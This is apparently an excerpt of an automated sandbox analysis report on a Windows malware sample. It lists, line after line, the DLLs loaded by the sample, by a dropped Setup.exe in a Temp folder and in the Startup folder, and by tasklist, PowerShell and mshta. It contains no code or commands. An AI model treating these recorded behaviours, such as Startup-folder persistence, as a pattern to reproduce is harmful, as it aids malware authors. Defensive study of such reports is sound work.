Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ffmpeg.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uiautomationcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: kbdus.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: windows.ui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: windowmanagementapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: inputhost.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mscms.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: coloradapterclient.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mmdevapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ffmpeg.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uiautomationcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mf.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mfplat.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: rtworkq.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: msmpeg2vdec.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mfperfhelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dxva2.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: msvproc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Section loaded: ntmarta.dll
